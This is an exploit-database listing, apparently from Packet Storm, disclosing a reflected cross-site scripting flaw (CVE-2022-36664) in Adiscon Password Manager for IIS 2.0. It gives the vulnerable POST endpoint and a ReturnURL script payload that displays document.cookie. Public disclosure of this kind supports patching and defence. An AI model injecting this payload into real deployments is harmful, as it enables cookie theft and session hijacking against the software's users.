Lucene search

K
packetstormVP4TR10TPACKETSTORM:168599
HistoryOct 03, 2022 - 12:00 a.m.

Password Manager For IIS 2.0 Cross Site Scripting

2022-10-0300:00:00
VP4TR10T
packetstormsecurity.com
178
exploit
iis
password manager
cve-2022-36664
cross site scripting
http protocol

EPSS

0.001

Percentile

47.3%

`# Exploit Title: *XSS*  
# Exploit Author: *VP4TR10T*  
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/  
<http://passwordmanager.adiscon.com/en/manual/>  
*# Software Link:*http://passwordmanager.adiscon.com/  
<http://passwordmanager.adiscon.com/>  
*# Version: *Version 2.0  
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664  
  
*Affected URI (when trying to change user password):  
POST /isapi/PasswordManager.dll HTTP/1.1  
  
HTTP Payload (Affected Parameter ):  
ReturnURL=<script>alert(document.cookie)</script>  
  
*Cordially,*  
`

EPSS

0.001

Percentile

47.3%

Related for PACKETSTORM:168599